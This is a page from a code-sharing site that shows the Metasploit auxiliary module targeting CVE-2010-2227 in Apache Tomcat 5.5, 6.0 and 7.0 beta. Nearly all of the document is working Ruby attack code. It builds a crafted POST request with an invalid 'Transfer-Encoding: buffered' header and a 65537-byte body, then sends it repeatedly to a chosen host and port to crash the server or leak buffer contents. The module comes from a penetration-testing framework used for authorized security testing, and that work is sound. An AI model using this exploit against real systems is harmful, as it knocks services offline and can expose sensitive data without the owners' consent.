CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(update_info(info,

12
      'Name'           => 'Apache Tomcat Transfer-Encoding Information Disclosure and DoS',

13
      'Description'    => %q{

14
          Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not

15
        properly handle an invalid Transfer-Encoding header, which allows remote attackers

16
        to cause a denial of service (application outage) or obtain sensitive information

17
        via a crafted header that interferes with "recycling of a buffer."

18
      },

19
      'Author'         =>

20
        [

21
          'Steve Jones', # original discoverer

22
          'Hoagie <andi[at]void.at>', # original public exploit

23
          'Paulino Calderon <calderon[at]websec.mx>', # metasploit module

24
        ],

25
      'License'        => MSF_LICENSE,

26
      'References'     =>

27
        [

28
          [ 'CVE', '2010-2227' ],

29
          [ 'OSVDB', '66319' ],

30
          [ 'BID', '41544' ]

31
        ],

32
      'DisclosureDate' => '2010-07-09'))

33


34
    register_options(

35
      [

36
        Opt::RPORT(8000),

37
        OptInt.new('RLIMIT', [ true,  "Number of requests to send", 25])

38
      ])

39
  end

40


41
  def run

42
    for x in 1..datastore['RLIMIT']

43
      begin

44
        connect

45
        print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")

46


47
        sploit = "POST / HTTP/1.1\r\n"

48
        sploit << "Host: " + rhost + "\r\n"

49
        sploit << "Transfer-Encoding: buffered\r\n"

50
        sploit << "Content-Length: 65537\r\n\r\n"

51
        sploit << Rex::Text.rand_text_alpha(1) * 65537

52


53
        sock.put(sploit + "\r\n\r\n")

54
        disconnect

55


56
        print_error("DoS packet unsuccessful")

57
      rescue ::Rex::ConnectionRefused

58
        print_error("Unable to connect to #{rhost}:#{rport}")

59
      rescue ::Errno::ECONNRESET

60
        print_good("DoS packet successful. #{rhost} not responding.")

61
      rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

62
        print_error("Couldn't connect to #{rhost}:#{rport}")

63
      rescue ::Timeout::Error, ::Errno::EPIPE

64
      end

65
    end

66
  end

67
end

68


69